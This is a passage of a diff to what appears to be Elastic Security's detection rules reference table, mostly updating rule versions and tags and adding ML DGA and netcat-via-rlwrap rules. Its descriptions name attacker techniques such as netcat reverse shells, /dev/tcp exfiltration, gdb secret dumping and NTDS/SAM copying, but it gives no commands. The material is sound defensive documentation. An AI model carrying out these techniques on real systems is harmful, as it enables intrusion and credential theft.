interactive system shell. The activity of spawning a shell from a binary is not common behavior for a user or system administrator, and may indicate an attempt to evade detection, increase capabilities or enhance the stability of an adversary. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |109 +|<<linux-restricted-shell-breakout-via-linux-binary-s, Linux Restricted Shell Breakout via Linux Binary(s)>> |Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an interactive system shell. The activity of spawning a shell from a binary is not common behavior for a user or system administrator, and may indicate an attempt to evade detection, increase capabilities or enhance the stability of an adversary. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |110 |<<linux-secret-dumping-via-gdb, Linux Secret Dumping via GDB>> |This rule monitors for potential memory dumping through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include "truffleproc" and "bash-memory-dump". This behavior should not happen by default, and should be investigated thoroughly. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 @@ -778,11 +790,11 @@ and their rule type is `machine_learning`. |<<linux-user-account-creation, Linux User Account Creation>> |Identifies attempts to create new users. Attackers may add new users to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide] |8.3.0 |2 -|<<linux-user-added-to-privileged-group, Linux User Added to Privileged Group>> |Identifies attempts to add a user to a privileged group. Attackers may add users to a privileged group in order to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |3 +|<<linux-user-added-to-privileged-group, Linux User Added to Privileged Group>> |Identifies attempts to add a user to a privileged group. Attackers may add users to a privileged group in order to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |4 -|<<linux-init-pid-1-secret-dump-via-gdb, Linux init (PID 1) Secret Dump via GDB>> |This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include "truffleproc" and "bash-memory-dump". This behavior should not happen by default, and should be investigated thoroughly. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |1 +|<<linux-init-pid-1-secret-dump-via-gdb, Linux init (PID 1) Secret Dump via GDB>> |This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include "truffleproc" and "bash-memory-dump". This behavior should not happen by default, and should be investigated thoroughly. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |2 -|<<local-account-tokenfilter-policy-disabled, Local Account TokenFilter Policy Disabled>> |Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |5 +|<<local-account-tokenfilter-policy-disabled, Local Account TokenFilter Policy Disabled>> |Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |6 |<<local-scheduled-task-creation, Local Scheduled Task Creation>> |Indicates the creation of a scheduled task. Adversaries can use these to establish persistence, move laterally, and/or escalate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |105 @@ -792,6 +804,16 @@ and their rule type is `machine_learning`. |<<macos-installer-package-spawns-network-event, MacOS Installer Package Spawns Network Event>> |Detects the execution of a MacOS installer package with an abnormal child process (e.g bash) followed immediately by a network connection via a suspicious process (e.g curl). Threat actors will build and distribute malicious MacOS installer packages, which have a .pkg extension, many times imitating valid software in order to persuade and infect their victims often using the package files (e.g pre/post install scripts etc.) to download additional tools or malicious software. If this rule fires it should indicate the installation of a malicious or suspicious package. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |104 +|<<machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain, Machine Learning Detected DGA activity using a known SUNBURST DNS domain>> |A supervised machine learning model has identified a DNS question name that used by the SUNBURST malware and is predicted to be the result of a Domain Generation Algorithm. |[Domain: Network], [Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Domain Generation Algorithm Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.9.0 |1 + +|<<machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain, Machine Learning Detected a DNS Request Predicted to be a DGA Domain>> |A supervised machine learning model has identified a DNS question name that is predicted to be the result of a Domain Generation Algorithm (DGA), which could indicate command and control network activity. |[Domain: Network], [Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Domain Generation Algorithm Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.9.0 |1 + +|<<machine-learning-detected-a-dns-request-with-a-high-dga-probability-score, Machine Learning Detected a DNS Request With a High DGA Probability Score>> |A supervised machine learning model has identified a DNS question name with a high probability of sourcing from a Domain Generation Algorithm (DGA), which could indicate command and control network activity. |[Domain: Network], [Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Domain Generation Algorithm Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.9.0 |1 + +|<<machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity, Machine Learning Detected a Suspicious Windows Event Predicted to be Malicious Activity>> |A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. |[OS: Windows], [Data Source: Elastic Endgame], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score, Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score>> |A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. |[OS: Windows], [Data Source: Elastic Endgame], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + |<<malicious-remote-file-creation, Malicious Remote File Creation>> |Malicious remote file creation, which can be an indicator of lateral movement activity. |[Domain: Endpoint], [Use Case: Lateral Movement Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.9.0 |1 |<<malware-detected-elastic-endgame, Malware - Detected - Elastic Endgame>> |Elastic Endgame detected Malware. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame] |8.3.0 |101 @@ -800,6 +822,8 @@ and their rule type is `machine_learning`. |<<masquerading-space-after-filename, Masquerading Space After Filename>> |This rules identifies a process created from an executable with a space appended to the end of the filename. This may indicate an attempt to masquerade a malicious file as benign to gain user execution. When a space is added to the end of certain files, the OS will execute the file according to it's true filetype instead of it's extension. Adversaries can hide a program's true filetype by changing the extension of the file. They can then add a space to the end of the name so that the OS automatically executes the file when it's double-clicked. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |4 +|<<memory-dump-file-with-unusual-extension, Memory Dump File with Unusual Extension>> |Identifies the creation of a memory dump file with an unusual extension, which can indicate an attempt to disguise a memory dump as another file type to bypass security defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 + |<<microsoft-365-exchange-anti-phish-policy-deletion, Microsoft 365 Exchange Anti-Phish Policy Deletion>> |Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access] |8.3.0 |102 |<<microsoft-365-exchange-anti-phish-rule-modification, Microsoft 365 Exchange Anti-Phish Rule Modification>> |Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access] |8.3.0 |102 @@ -842,53 +866,53 @@ and their rule type is `machine_learning`. |<<microsoft-365-user-restricted-from-sending-email, Microsoft 365 User Restricted from Sending Email>> |Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access] |8.3.0 |102 -|<<microsoft-build-engine-started-an-unusual-process, Microsoft Build Engine Started an Unusual Process>> |An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script or the Visual C# Command Line Compiler. This technique is sometimes used to deploy a malicious payload using the Build Engine. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.6.0 |206 +|<<microsoft-build-engine-started-an-unusual-process, Microsoft Build Engine Started an Unusual Process>> |An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script or the Visual C# Command Line Compiler. This technique is sometimes used to deploy a malicious payload using the Build Engine. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.6.0 |207 -|<<microsoft-build-engine-started-by-a-script-process, Microsoft Build Engine Started by a Script Process>> |An instance of MSBuild, the Microsoft Build Engine, was started by a script or the Windows command interpreter. This behavior is unusual and is sometimes used by malicious payloads. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.6.0 |205 +|<<microsoft-build-engine-started-by-a-script-process, Microsoft Build Engine Started by a Script Process>> |An instance of MSBuild, the Microsoft Build Engine, was started by a script or the Windows command interpreter. This behavior is unusual and is sometimes used by malicious payloads. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.6.0 |206 |<<microsoft-build-engine-started-by-a-system-process, Microsoft Build Engine Started by a System Process>> |An instance of MSBuild, the Microsoft Build Engine, was started by Explorer or the WMI (Windows Management Instrumentation) subsystem. This behavior is unusual and is sometimes used by malicious payloads. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<microsoft-build-engine-started-by-an-office-application, Microsoft Build Engine Started by an Office Application>> |An instance of MSBuild, the Microsoft Build Engine, was started by Excel or Word. This is unusual behavior for the Build Engine and could have been caused by an Excel or Word document executing a malicious script payload. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<microsoft-build-engine-using-an-alternate-name, Microsoft Build Engine Using an Alternate Name>> |An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 +|<<microsoft-build-engine-using-an-alternate-name, Microsoft Build Engine Using an Alternate Name>> |An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |109 -|<<microsoft-exchange-server-um-spawning-suspicious-processes, Microsoft Exchange Server UM Spawning Suspicious Processes>> |Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |104 +|<<microsoft-exchange-server-um-spawning-suspicious-processes, Microsoft Exchange Server UM Spawning Suspicious Processes>> |Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |105 -|<<microsoft-exchange-server-um-writing-suspicious-files, Microsoft Exchange Server UM Writing Suspicious Files>> |Identifies suspicious files being written by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26858. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |104 +|<<microsoft-exchange-server-um-writing-suspicious-files, Microsoft Exchange Server UM Writing Suspicious Files>> |Identifies suspicious files being written by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26858. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |105 |<<microsoft-exchange-transport-agent-install-script, Microsoft Exchange Transport Agent Install Script>> |Identifies the use of Cmdlets and methods related to Microsoft Exchange Transport Agents install. Adversaries may leverage malicious Microsoft Exchange Transport Agents to execute tasks in response to adversary-defined criteria, establishing persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |1 -|<<microsoft-exchange-worker-spawning-suspicious-processes, Microsoft Exchange Worker Spawning Suspicious Processes>> |Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<microsoft-exchange-worker-spawning-suspicious-processes, Microsoft Exchange Worker Spawning Suspicious Processes>> |Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<microsoft-iis-connection-strings-decryption, Microsoft IIS Connection Strings Decryption>> |Identifies use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<microsoft-iis-service-account-password-dumped, Microsoft IIS Service Account Password Dumped>> |Identifies the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords. An attacker with IIS web server access via a web shell can decrypt and dump the IIS AppPool service account password using AppCmd. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<microsoft-windows-defender-tampering, Microsoft Windows Defender Tampering>> |Identifies when one or more features on Microsoft Defender are disabled. Adversaries may disable or tamper with Microsoft Defender features to evade detection and conceal malicious behavior. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<microsoft-windows-defender-tampering, Microsoft Windows Defender Tampering>> |Identifies when one or more features on Microsoft Defender are disabled. Adversaries may disable or tamper with Microsoft Defender features to evade detection and conceal malicious behavior. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 |<<mimikatz-memssp-log-file-detected, Mimikatz Memssp Log File Detected>> |Identifies the password log file from the default Mimikatz memssp module. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<modification-of-amsienable-registry-key, Modification of AmsiEnable Registry Key>> |Identifies modifications of the AmsiEnable registry key to 0, which disables the Antimalware Scan Interface (AMSI). An adversary can modify this key to disable AMSI protections. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<modification-of-amsienable-registry-key, Modification of AmsiEnable Registry Key>> |Identifies modifications of the AmsiEnable registry key to 0, which disables the Antimalware Scan Interface (AMSI). An adversary can modify this key to disable AMSI protections. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<modification-of-boot-configuration, Modification of Boot Configuration>> |Identifies use of bcdedit.exe to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<modification-of-dynamic-linker-preload-shared-object, Modification of Dynamic Linker Preload Shared Object>> |Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<modification-of-dynamic-linker-preload-shared-object, Modification of Dynamic Linker Preload Shared Object>> |Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |207 |<<modification-of-dynamic-linker-preload-shared-object-inside-a-container, Modification of Dynamic Linker Preload Shared Object Inside A Container>> |This rule detects the creation or modification of the dynamic linker preload shared object (ld.so.preload) inside a container. The Linux dynamic linker is used to load libraries needed by a program at runtime. Adversaries may hijack the dynamic linker by modifying the /etc/ld.so.preload file to point to malicious libraries. This behavior can be used to grant unauthorized access to system resources and has been used to evade detection of malicious processes in container environments. |[Data Source: Elastic Defend for Containers], [Domain: Container], [Tactic: Defense Evasion] |8.8.0 |1 |<<modification-of-environment-variable-via-launchctl, Modification of Environment Variable via Launchctl>> |Identifies modifications to an environment variable using the built-in launchctl command. Adversaries may execute their own malicious payloads by hijacking certain environment variables to load arbitrary libraries or bypass certain restrictions. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<modification-of-openssh-binaries, Modification of OpenSSH Binaries>> |Adversaries may modify SSH related binaries for persistence or credential access by patching sensitive functions to enable unauthorized access or by logging SSH credentials for exfiltration. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Persistence], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<modification-of-openssh-binaries, Modification of OpenSSH Binaries>> |Adversaries may modify SSH related binaries for persistence or credential access by patching sensitive functions to enable unauthorized access or by logging SSH credentials for exfiltration. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Persistence], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<modification-of-safari-settings-via-defaults-command, Modification of Safari Settings via Defaults Command>> |Identifies changes to the Safari configuration using the built-in defaults command. Adversaries may attempt to enable or disable certain Safari settings, such as enabling JavaScript from Apple Events to ease in the hijacking of the users browser. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<modification-of-standard-authentication-module-or-configuration, Modification of Standard Authentication Module or Configuration>> |Adversaries may modify the standard authentication module for persistence via patching the normal authorization process or modifying the login configuration to allow unauthorized access or elevate privileges. |[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 +|<<modification-of-standard-authentication-module-or-configuration, Modification of Standard Authentication Module or Configuration>> |Adversaries may modify the standard authentication module for persistence via patching the normal authorization process or modifying the login configuration to allow unauthorized access or elevate privileges. |[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Persistence], [Data Source: Elastic Defend] |8.6.0 |204 |<<modification-of-wdigest-security-provider, Modification of WDigest Security Provider>> |Identifies attempts to modify the WDigest security provider in the registry to force the user's password to be stored in clear text in memory. This behavior can be indicative of an adversary attempting to weaken the security configuration of an endpoint. Once the UseLogonCredential value is modified, the adversary may attempt to dump clear text passwords from memory. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<modification-of-the-mspkiaccountcredentials, Modification of the msPKIAccountCredentials>> |Identify the modification of the msPKIAccountCredentials attribute in an Active Directory User Object. Attackers can abuse the credentials roaming feature to overwrite an arbitrary file for privilege escalation. ms-PKI-AccountCredentials contains binary large objects (BLOBs) of encrypted credential objects from the credential manager store, private keys, certificates, and certificate requests. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Data Source: Active Directory], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring] |8.3.0 |6 +|<<modification-of-the-mspkiaccountcredentials, Modification of the msPKIAccountCredentials>> |Identify the modification of the msPKIAccountCredentials attribute in an Active Directory User Object. Attackers can abuse the credentials roaming feature to overwrite an arbitrary file for privilege escalation. ms-PKI-AccountCredentials contains binary large objects (BLOBs) of encrypted credential objects from the credential manager store, private keys, certificates, and certificate requests. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Data Source: Active Directory], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring] |8.3.0 |7 -|<<modification-or-removal-of-an-okta-application-sign-on-policy, Modification or Removal of an Okta Application Sign-On Policy>> |Detects attempts to modify or delete a sign on policy for an Okta application. An adversary may attempt to modify or delete the sign on policy for an Okta application in order to remove or weaken an organization's security controls. |[Tactic: Persistence], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.3.0 |105 +|<<modification-or-removal-of-an-okta-application-sign-on-policy, Modification or Removal of an Okta Application Sign-On Policy>> |Detects attempts to modify or delete a sign on policy for an Okta application. An adversary may attempt to modify or delete the sign on policy for an Okta application in order to remove or weaken an organization's security controls. |[Tactic: Persistence], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.10.0 |206 |<<mofcomp-activity, Mofcomp Activity>> |Managed Object Format (MOF) files can be compiled locally or remotely through mofcomp.exe. Attackers may leverage MOF files to build their own namespaces and classes into the Windows Management Instrumentation (WMI) repository, or establish persistence using WMI Event Subscription. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 @@ -916,15 +940,17 @@ and their rule type is `machine_learning`. |<<my-first-rule, My First Rule>> |This rule helps you test and practice using alerts with Elastic Security as you get set up. It’s not a sign of threat activity. |[Use Case: Guided Onboarding], [Data Source: APM], [OS: Windows], [Data Source: Elastic Endgame] |8.7.0 |2 -|<<ntds-or-sam-database-file-copied, NTDS or SAM Database File Copied>> |Identifies a copy operation of the Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files. Those files contain sensitive information including hashed domain and/or local credentials. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<ntds-or-sam-database-file-copied, NTDS or SAM Database File Copied>> |Identifies a copy operation of the Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files. Those files contain sensitive information including hashed domain and/or local credentials. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<namespace-manipulation-using-unshare, Namespace Manipulation Using Unshare>> |Identifies suspicious usage of unshare to manipulate system namespaces. Unshare can be utilized to escalate privileges or escape container security boundaries. Threat actors have utilized this binary to allow themselves to escape to the host and access other resources or escalate privileges. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |6 +|<<namespace-manipulation-using-unshare, Namespace Manipulation Using Unshare>> |Identifies suspicious usage of unshare to manipulate system namespaces. Unshare can be utilized to escalate privileges or escape container security boundaries. Threat actors have utilized this binary to allow themselves to escape to the host and access other resources or escalate privileges. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |7 |<<netcat-listener-established-inside-a-container, Netcat Listener Established Inside A Container>> |This rule detects an established netcat listener running inside a container. Netcat is a utility used for reading and writing data across network connections, and it can be used for malicious purposes such as establishing a backdoor for persistence or exfiltrating data. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.8.0 |2 +|<<netcat-listener-established-via-rlwrap, Netcat Listener Established via rlwrap>> |Monitors for the execution of a netcat listener via rlwrap. rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. This utility can be used in conjunction with netcat to gain a more stable reverse shell. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |1 + |<<netsh-helper-dll, Netsh Helper DLL>> |Identifies the addition of a Netsh Helper DLL, netsh.exe supports the addition of these DLLs to extend its functionality. Attackers may abuse this mechanism to execute malicious payloads every time the utility is executed, which can be done by administrators or a scheduled task. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<network-activity-detected-via-cat, Network Activity Detected via cat>> |This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |1 +|<<network-activity-detected-via-cat, Network Activity Detected via cat>> |This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |2 |<<network-connection-via-certutil, Network Connection via Certutil>> |Identifies certutil.exe making a network connection. Adversaries could abuse certutil.exe to download a certificate, or malware, from a remote URL. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 @@ -932,33 +958,33 @@ and their rule type is `machine_learning`. |<<network-connection-via-msxsl, Network Connection via MsXsl>> |Identifies msxsl.exe making a network connection. This may indicate adversarial activity as msxsl.exe is often leveraged by adversaries to execute malicious scripts and evade detection. |[Domain: Endpoint], [OS: Windows], 